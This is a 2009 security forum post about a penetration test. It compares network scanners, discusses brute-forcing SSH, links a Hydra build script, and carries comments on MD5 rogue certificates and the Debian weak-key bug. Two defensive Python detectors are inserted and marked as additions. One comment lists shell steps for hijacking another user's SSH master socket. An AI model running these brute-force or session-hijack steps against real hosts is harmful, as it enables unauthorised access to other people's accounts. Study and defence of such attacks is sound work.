House of Hackers

The-Insider

Pen-Tests in 2008 and Why don't you crack ssh?

I recently did a pen-test of a medium-sized American firm, and it seems that the number of public remote exploits for devices such as Juniper, Netopia, Cisco (telnet) and default Linux services has dropped to as low as one or two each since 2004.

Since any respectable firm has Windows Update turned on and Fedora-style Linux distributions also update automatically, I came to the conclusion that the cycle of:
Safe --> Research --> Exploit --> Public Disclosure --> Patch --> Automatic Update --> Safe
means that black-box penetration testers don't have much to show the client except configuration errors, a few user enumerations and other less critical findings that don't get fixed by the vendors.

The solution would be for pen-testers to find their own exploits, which is why most of the tools written in the last few years are fuzzers.
But Cisco, Netopia, Juniper and the Linux services were already fuzzed as hell before they shipped to clients, so this doesn't seem like a good approach to the problem either.

My suggestions:
1) If you are a pen-tester, research and discover your own vulnerabilities, create workarounds for them, show them to your client and keep them to yourself!
2) If you are a researcher, supply a working P.O.C., because pen-testers don't have time to buy that machine and develop working shellcode for your vulnerability.

Being 13 hops away from the machines I was pen-testing, I was amazed to see that extremely mainstream and trusted products fail at such a simple task.
I used Nmap to scan the network range (of course with -P0, or -PN in the new version) and only two HTTP servers were discovered across 8 hosts. As I am not a big fan of Nmap, I went back to what I used in the past: GFI LANguard.

I scanned the targets using GFI LANguard (a great tool when used inside local networks) with a complete TCP and UDP port scan, a 20 second TCP timeout and an 8 second UDP timeout. These timeouts are EXTREME and should give the most accurate results. The scan results were very poor: about 3 open ports on 8 machines!!! Of course I checked that nothing else was running on my internet connection, to make sure this wasn't just a bad dream. I scanned again and one more port was discovered: SSH!

I decided this couldn't be true and returned to Nmap with the "slow and intensive" scan. The results were better, about 5 TCP ports and 1 SNMP, but I thought "still no way that is all they've got!"

Finally, I installed the latest version of Nessus (Tenable Nessus 3), configured it with high timeouts and ran the scan. The results were AMAZING!!! It didn't miss anything the other scanners had found, and it discovered 15 more UDP ports and 7 more TCP ports. From now on I am only scanning with Nessus; my time is worth it!

Now that I had some interesting services to attack, I wanted to try to log into one of the Linux machines over SSH. It sounded simple to me: "I will download a dictionary/brute-force SSH tool and that's it". Apparently not!
There is an ancient Perl script floating around the web that drives SSH through "expect". THAT-IS-LAME. Someone who agreed wrote a Ruby script that uses the Net::SSH library to automate attempts, quite similar to Tim's SShatter Perl script; that is nice, but there is still no multithreading support.
Of course you may think "Why not use THC Hydra?" The answer is that by default it is not configured to be compiled with libssh, and you have to get some libs; you will burn a few hours making it work!

My dear friend "Kiril Nesenko" AKA "axi1es" wrote for YOU guys the script for "The Common Lazy Fedora Guy", which downloads Hydra, the SSH and other libs, configures and compiles it, and runs Hydra, all automatically. Enjoy! :)
http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh
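The post ends with SSH dictionary attacks; the other side of that, added here as an example that is not part of the original post, is spotting such an attack in sshd's auth log. The detector below parses "Failed password" lines and raises an alert for any source address that produces a burst of failures inside a sliding time window. The log lines, hostnames and addresses are constructed for the demo, and the threshold and window size are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log lines (not from the post): one source address
# hammering sshd with failed passwords, one legitimate user with a single typo.
SAMPLE_LOG = """\
Jan  5 20:40:01 gw sshd[4121]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jan  5 20:40:02 gw sshd[4122]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2
Jan  5 20:40:03 gw sshd[4123]: Failed password for invalid user oracle from 203.0.113.7 port 51024 ssh2
Jan  5 20:40:04 gw sshd[4124]: Failed password for root from 203.0.113.7 port 51025 ssh2
Jan  5 20:40:05 gw sshd[4125]: Failed password for invalid user test from 203.0.113.7 port 51026 ssh2
Jan  5 20:40:06 gw sshd[4126]: Failed password for root from 203.0.113.7 port 51027 ssh2
Jan  5 20:41:10 gw sshd[4130]: Failed password for bob from 198.51.100.12 port 40001 ssh2
Jan  5 20:41:15 gw sshd[4130]: Accepted publickey for bob from 198.51.100.12 port 40001 ssh2
Jan  5 20:55:00 gw sshd[4140]: Failed password for root from 203.0.113.7 port 51100 ssh2
"""

# Matches the classic syslog-style sshd authentication lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed password|Accepted \w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_line(line, year=2009):
    """Parse one sshd auth line into a dict, or return None for unrelated lines.
    syslog timestamps carry no year, so the caller supplies one (assumption)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ip": m["ip"], "user": m["user"],
            "failed": m["result"].startswith("Failed")}

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: (first_ts, last_ts, count)} for every source address that
    produced at least `threshold` failed logins inside any sliding window of
    `window_seconds`. A per-address deque keeps memory bounded by the window."""
    recent = defaultdict(deque)
    alerts = {}
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None or not ev["failed"]:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        # Drop failures that have fallen out of the window.
        while (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            prev = alerts.get(ev["ip"])
            first = prev[0] if prev else q[0]
            count = max(prev[2], len(q)) if prev else len(q)
            alerts[ev["ip"]] = (first, ev["ts"], count)
    return alerts

if __name__ == "__main__":
    for ip, (first, last, n) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} failed SSH logins between "
              f"{first:%H:%M:%S} and {last:%H:%M:%S}")
```

On the sample data only 203.0.113.7 trips the alert (six failures in six seconds); bob's single typo and the attacker's lone retry fifteen minutes later stay below the threshold, which is the point of using a window rather than a lifetime counter.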


Comment by dozzyjean on July 16, 2009 at 8:15pm
Hey, your questions are all ok based on SSH, and rvdh, I like your spirit a lot, keep it up dude. Based on hacking SSH, maybe these can be a little bit useful for all:
hostname
kdc

host kdc

showmount -e

showmount -a

cd /home

ls

su - bob

cd .ssh

ssh host2

ssh-keygen -t rsa

cp id_rsa.pub authorized_keys

hostname

WAIT FOR THE TARGET TO SSH IN MASTER MODE

ssh -M -S socket host2

NOW HIJACK TARGET SSH SOCKET
su - bob

ssh -S socket host2


If that looks okay to you then all is fine with all. Hope to hear from all, dude.
Comment by vnsec on March 2, 2009 at 2:04pm
Try this, man! http://freereverseip.com
==>The best service to find all websites on a host
And more...
Comment by univax on January 5, 2009 at 10:04pm
Thank you very much.
Comment by The-Insider on January 5, 2009 at 10:01pm
http://www.win.tue.nl/hashclash/rogue-ca/
http://blogs.zdnet.com/security/?p=2339
http://blogs.zdnet.com/security/?p=2341
http://blogs.zdnet.com/security/?p=2343
http://www.google.com/search?q=MD5+CA+fake&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:he:official&client=firefox-a
http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Ahe%3Aofficial&hs=C4c&q=MD5+Collision+certificates&btnG=Search
Comment by univax on January 5, 2009 at 8:48pm
The_Insider, can you give me a link to any article about the faked CA key incident you mentioned?

We've been discussing the md5 collision issue in another forum, and there is a debate about whether this is actually a feasible threat or if the major CA's have already been adequately notified and corrective action taken.

Any additional info you can point me to is appreciated.

Thanks.
Comment by The-Insider on January 5, 2009 at 8:40pm
thx :)
Comment by rvdh on January 5, 2009 at 7:54pm
I know, but I found the OpenSSL issue one of the highlights of last year. Pretty duped that someone can be so stupid. And yes, Nessus is great. I would recommend it highly for any pentester. Btw, you have some nice research on browsers; I skimmed through your site last evening, excellent stuff.
Comment by The-Insider on January 4, 2009 at 7:26pm
These days we also have the certificate validation issues, because it is feasible to create collisions for MD5 and in many cases (such as SSL) the MD5 of the keys is what gets matched; then attackers can create a valid "fake/spoofed" key, like the case in the last few days where they faked the key of the Certificate Authority itself.
Comment by rvdh on January 4, 2009 at 6:55pm
Oh yes, the OpenSSL issue, that's true. If it's signed by OpenSSL then you have a problem. Given this thought, I wonder how many certs are still signed with it. Would be cool to do a survey on this.
Comment by The-Insider on January 4, 2009 at 6:32pm
Yes, but there are other issues, also with keys.
For example the bug that was found on Debian machines, where the key generator was only randomizing in a range of a WORD (16 bits), which resulted in ANY DEBIAN MACHINE HAVING ONLY A MAXIMUM OF 65536 POSSIBLE SSH KEYS, which is much worse than a dictionary :)
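A defender's check for the kind of weak-key problem rvdh and The-Insider discuss above, added here as an example and not code from the thread: when a generator can only produce a small, enumerable set of keys, every one of them can be fingerprinted ahead of time and an authorized_keys file scanned against that blacklist, which is the approach Debian's ssh-vulnkey tool took. The key lines, the blacklist contents and the tiny RSA moduli below are constructed for the demo; a real blacklist would hold the fingerprints of the keys the broken generator can actually produce. The scanner assumes plain "type blob comment" lines without leading authorized_keys options.

```python
import base64
import hashlib
import struct

def ssh_string(b):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def ssh_mpint(n):
    """SSH wire-format mpint for a non-negative integer (a leading zero byte is
    added when the top bit is set so the value is not read as negative)."""
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if b and b[0] & 0x80:
        b = b"\x00" + b
    return ssh_string(b)

def make_rsa_pubkey_line(n, e, comment):
    """Build an authorized_keys line from RSA (n, e). The moduli used below are
    constructed toy values, far too small for a real key."""
    blob = ssh_string(b"ssh-rsa") + ssh_mpint(e) + ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"

def md5_fingerprint(line):
    """OpenSSH-style MD5 fingerprint (16 colon-separated hex bytes) of the
    base64 key blob in a 'type blob comment' public key line."""
    blob = base64.b64decode(line.split()[1])
    h = hashlib.md5(blob).hexdigest()
    return ":".join(h[i:i + 2] for i in range(0, 32, 2))

def find_blacklisted(authorized_keys_text, blacklist):
    """Return (line_no, comment, fingerprint) for every key whose fingerprint
    is in `blacklist`; blank lines and '#' comments are skipped."""
    hits = []
    for no, line in enumerate(authorized_keys_text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        fp = md5_fingerprint(line)
        if fp in blacklist:
            comment = fields[2] if len(fields) > 2 else ""
            hits.append((no, comment, fp))
    return hits

# Constructed test data: pretend WEAK_KEY came out of the broken generator and
# therefore appears in the blacklist, while GOOD_KEY does not.
WEAK_KEY = make_rsa_pubkey_line(n=0xC2B9F1, e=65537, comment="bob@debian-box")
GOOD_KEY = make_rsa_pubkey_line(n=0xD7A3E5, e=65537, comment="bob@laptop")
BLACKLIST = {md5_fingerprint(WEAK_KEY)}
AUTHORIZED_KEYS = "# keys for bob\n" + WEAK_KEY + "\n" + GOOD_KEY + "\n"

if __name__ == "__main__":
    for no, comment, fp in find_blacklisted(AUTHORIZED_KEYS, BLACKLIST):
        print(f"line {no}: key '{comment}' ({fp}) is blacklisted, remove it")
```

The fingerprint is computed over the decoded key blob exactly as it appears in the file, so the same function serves both for building the blacklist from generated keys and for checking deployed ones; a hit means the key must be replaced, since anyone who can enumerate the generator's output already holds the matching private half.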

© 2009 Created by pdp on Ning.